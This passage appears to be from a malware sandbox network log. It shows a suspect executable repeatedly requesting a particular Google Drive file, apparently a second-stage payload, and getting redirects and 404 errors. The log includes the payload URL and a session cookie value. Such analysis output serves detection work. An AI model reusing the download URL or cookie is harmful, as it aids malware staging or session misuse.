                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:26 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:25 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-pRCgEhwviAKTKxpjgTcnXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        59 | 192.168.11.20 | 49810 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:26 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:26 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:26 GMT
                                                        Content-Security-Policy: script-src 'nonce-7-03QxQb97E_Ufe9rc4Bng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7dex4EYLaJpvfC7NMmr4MRAC3ru8U9uzOw3tNgwArQL5hqjc2gZbPwvPZhZ2QtrNM2zV4dQc2bkA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:26 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="y3lH9Z7855kjN0YwSmJi6Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        60 | 192.168.11.20 | 49811 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:36 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:37 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Ff15Zi-EgfSrbeUA5LNPAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        61 | 192.168.11.20 | 49812 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:37 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:37 UTC  1854               IN         HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:37 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-uCoUTF2a_GYBEUlDdKGlcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7MbuDB0N3d-oWBCrkLsSpynXVdBlel4wPreBjqfrWKwsL2H50bEuga4RPOGT7GnNDJ1E4CqSmu4Q
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:37 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C1BI2npct83RS1X25Hil0g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
                                                        62          192.168.11.20  49813        142.250.217.238  443               5216  C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-05 16:08:48 UTC  418                OUT        GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:48 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:48 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-sv5fWaz_QcqTSD2BalFEbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
                                                        63          192.168.11.20  49814        142.250.64.193   443               5216  C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-05 16:08:48 UTC  460                OUT        GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:48 UTC  1847               IN         HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:48 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-SvCIib4xIIGOMaB8VGxvpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC53MR9wRBGHqPY0M1JN37EVuAwQFnIpEbFHzrUSqaPnpC6-dvrvXQ0Rdwx3NVSWIfmx40M
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:48 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1qLsviZK8AN9bcAysHuMsw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
                                                        64          192.168.11.20  49815        142.250.217.238  443               5216  C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-05 16:08:59 UTC  418                OUT        GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:59 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:59 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-wW-E9UJPxeRwHoKucCPoeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
                                                        65          192.168.11.20  49816        142.250.64.193   443               5216  C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-05 16:08:59 UTC  460                OUT        GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:09:00 UTC  1854               IN         HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:09:00 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-YHu4JF1huwsJQVHxQCU7gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4kktxTQnTKX-5zL0iksR_VI3daODD0HP2upn29js632xsopr-GLznrMLkEjE6vvYKUAsuHUbw9JQ
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:09:00 UTC  1652               IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vIXjJsyH8a_gvVyfI9E-Nw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
                                                        66          192.168.11.20  49817        142.250.217.238  443               5216  C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp                Bytes transferred  Direction  Data
                                                        2024-12-05 16:09:10 UTC  418                OUT        GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:09:10 UTC  1920               IN         HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:09:10 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-QanH7FVhikG_X6ZkdQ2JqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID  Source IP      Source Port  Destination IP   Destination Port  PID   Process
                                                        67          192.168.11.20  49818        142.250.64.193   443               5216  C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp                Bytes transferred  Direction  Data
